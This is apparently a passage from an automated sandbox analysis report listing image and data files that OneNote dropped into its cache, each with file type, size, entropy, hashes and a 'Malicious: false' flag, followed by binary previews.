Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.377445874339815
Encrypted:	false
SSDEEP:	96:VQ/sQ75pMEXNrxMXIXf39GgRQy/IniM2k:gsQ7pXNmXIXv9GgRJ/5M
MD5:	3FADFD78E7DBBE1D4E1BA4FF2101C24E
SHA1:	4F43FE6A6EB78E270DB657B8E12B349916A8F4BB
SHA-256:	1BE1D6D93A1B94DE39794BFB0F7CEC1659F3B481E051FA66A1D29189D70D260A
SHA-512:	00AAE846D8C27C08AAC832614525238002A184773B2F0D2A8F5DBB5849436B18316CA00A6D604BD35EA751AF069B672A3D997C6A2966A14300B380B89ADDD1F1
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ...................&.............&.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............L<Vm".%...v.x.....N...^.................:!.x.K.....z........f........................................I.qk..B.....LZ..............L<Vm".%...v.x...........L<Vm".%...v.x.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.336155261241889
Encrypted:	false
SSDEEP:	96:is0Asp2KyCEmdNXPx9bURQyE8y20HsFhNbh:is0AsMKmmHX59bURJEe0HsFhNb
MD5:	84CBB0B3DBE4E9794436DD9C8AC1CFAC
SHA1:	52B6F86667C971F80A5BBDFF309E9896935AC755
SHA-256:	B93A4E86D4BB9C4C7ADDDB40C009991FE1ACDD474980B446602BB638F4F281C2
SHA-512:	B06A8AE705CDC7E3421621A0119A8E582AFF5468E19646218568078B2C18DBAFA6CC18EA9694404F8A342BA4B2BE4B26A197AFF3F12958B1A2C3D91BF7785099
Malicious:	false
Preview:	2...>.......V...v...J...................................................................................................................................2...>...2.......v...~............................I.......I.qk..B.....LZ...........N..L...)?.....N..L...)?.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................4..M..$..%..4....N...^................YhA...O.}g,.c..........f........................................I.qk..B.....LZ...............4..M..$..%..4...........4..M..$..%..4........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000051.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.466918767844075
Encrypted:	false
SSDEEP:	48:isBJ4x/Xsk//GOtUEesXS9KWsDoYrdQVruiMBXMhvgDeTDVk7hbETDALWI:isOdH1WEnXS9lsDlRQ56ygj
MD5:	138770A898FA003E42BB8470367EC863
SHA1:	A6BAD4BFDFDD86DF173AE03041ABFCF339C8810B
SHA-256:	5E3946E0B30DD26648C64240E6ADB784D67E80379A7DB784D46AE695E654AC2C
SHA-512:	747A72B9A23995CB9402F4EB2AA01304D459D432A802F1FB0B9C9C95C8FE0B2FB3A1CB8F2151C4F609487421B37D8AAFB702B3106069B3E2EFAD4A984CC9301B
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ...........n.....s.F%AP....n.....s.F%AP......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................=..3m_.........N...^................<<.C.A...mQPm........Z........................................I.qk..B.....LZ.................=..3m_..................=..3m_.............................................................................j.......T$c...............G.......H.......>............. .3...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000053.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000055.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.332372160679881
Encrypted:	false
SSDEEP:	48:tTGrsGwf2GhUuaWrt6n6MED5IXeUj96RkoVrdQqrPLeTBXUWUzGhqpuSFKL49:twstaWr0nnEmXeUj96y0RQyPsm1
MD5:	FE25045CCB022E14B13F78EC2C576840
SHA1:	FB5A48BE4F37575073B85D1DFF58294C553F1028
SHA-256:	67B1B4A35695CE9707F84F4EF21C45F0F60DC12C94E4B9FAF79451167A47ABA9
SHA-512:	6A571DD97CF875BFD559EF218C9494F4186091421FF35B8C898D5847DC450DD9DAEF7770224D178E8234077D7EC4ABAC933C2A1D7D27D29188B02290A6F8722A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ............q....x3..n,.....q....x3..n,......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............8.R.....e.B.%......N...^...............K.yk..rG.w.5.r.x........f........................................I.qk..B.....LZ.............8.R.....e.B.%...........8.R.....e.B.%..........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000057.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.343167073739944
Encrypted:	false
SSDEEP:	48:Yu2s7lM6C6fDBGytmNB6EuVL7XE1IG/9WkoRrdQqrz0LGtBXqR62ku:YZsW6NBGyQ6EuVHXSF9WkYRQyR6k
MD5:	761562A571DEF4F2746F7FC2A65526EE
SHA1:	CB5172EC0CE73BFEFC6C88208271E5C1317D40FC
SHA-256:	E4F4580E36D0FD7E133F0B7D405626067D26F4FC1A7D5D57BF5E33DA3E4DCA57
SHA-512:	274075A5E959791E31D0D5EEDB6E24D5B1034D96E0673684298812FC74717637236F32A1FBECC5EFD76F4B45BAD290CEAD0BEF6A1B7EB37AB6100BAAD6D67929
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ._......._.~%...z2....._.~%...z2....._...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................Gpn..9..c.Y.[....N...^...............h.@9].J.z....;.........f........................................I.qk..B.....LZ...............Gpn..9..c.Y.[...........Gpn..9..c.Y.[.........._......._......._..........................................._.j....._.T.]..._......._..B..._.H....._...B..._...>.)._...J...................;........4...4...4.."..............._..._..._...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........._......._.....#._.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000059.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.318441018518079
Encrypted:	false
SSDEEP:	48:Yufp0spcweKIhpU8ttps5OEr7LCX6C+9m6oFrdQqrDwmpOBBXgU0lT2A0d0vDfF:YpspLKpUSLsOEr7eX619m60RQylOBYZ
MD5:	C1CC037ECAF0D7A4BE80D479855BDF69
SHA1:	0E0B51AF0C65EFC76103E7D45130ADC413F47EB3
SHA-256:	9EC9083492DBEB026C49640C9DC050BF21245BDD609643C7E6103F9D16EEF8E8
SHA-512:	0437EAA88176C1BE7C53108350046776708C3B0214937F95820304C056CA7520160F5772767C33B0E8F49A8DF2580AA9B829E2D61F249A8DCD8FE5D641C8DC8D
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZqs......qs.g....<....h.qs.g....<....h.qs...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............o.J.....7B...m^.....N...^...............^..Mm4N.....s.........f........................................I.qk..B.....LZ............o.J.....7B...m^.........o.J.....7B...m^..........qs......qs......qs..........................................qs.j....qs.T.]..qs......qs..B..qs.H....qs...B..qs...>.)qs...J...................;........4...4...4.."..............qs..qs..qs...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........qs......qs.....#qs.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.338918828438928
Encrypted:	false
SSDEEP:	96:Y9sN+B8QEPUXo9hg9IRQyF/RJpElUpbyi:GsN+BSPUXo9u9IRJVRJpElUpei
MD5:	4F66B6976EFB23A9F3ADAF63A2FBB44A
SHA1:	8328270A7F6EA11424DA6C612BA076854D2EBDDA
SHA-256:	4FE556954A17B47E7DEC312CEBE375BBE305D30F758A13AD1035C1279306ECA5
SHA-512:	6E4E93C42BFE0ECA976D7A6986D32418461A5BBEFD7A38EF3D38EC66F6C5F3DC4EEC9B2DEFCBDD816B7970EB44E26EF732B5983683CDD4BA0981D26F6F608560
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x.........................................2........?.I.......I.qk..B.....LZ......2........?.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............m.P.A....J.MA.H....N...^................_.....O...A............f........................................I.qk..B.....LZ............m.P.A....J.MA.H........m.P.A....J.MA.H........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.337809145062041
Encrypted:	false
SSDEEP:	48:LnEs1tPQY2ZrMGt3XqNE+YlLPlXsWGXR9SVDoBrdQqrzV+D2BXpY9Jmad:LnEskZrBdOEplJXsWGh9SB4RQyZDG
MD5:	DECF1B20D76AD33649B582FB04C6E9FA
SHA1:	1EC1145AE1739DBD45EABB3E3D37E2346151E463
SHA-256:	D0076DADE90454C2F81D61F3BD99BB65F4A563DF4752A6FB5E6D38B072C65D20
SHA-512:	19C67FE416C94E65F4F144EC0D67E5492E0C04F6739719EBA95932583DAA658B4CF14C7E53D161D2BB15AAC20F265560F540198AFB0B249B644B5E11268970B7
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZW,h.....W,hG....!._..K..W,hG....!._..K..W,h..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............G.q!.,....B.l......N...^................%...WYC....$.5.........f........................................I.qk..B.....LZ............G.q!.,....B.l..........G.q!.,....B.l...........W,h.....W,h.....W,h.........................................W,hj....W,hT.]..W,h.....W,h..B..W,hH....W,h..B..W,h..>.)W,h..J...................;........4...4...4.."..............W,h.W,h.W,h..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........W,h.....W,h....#W,h............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
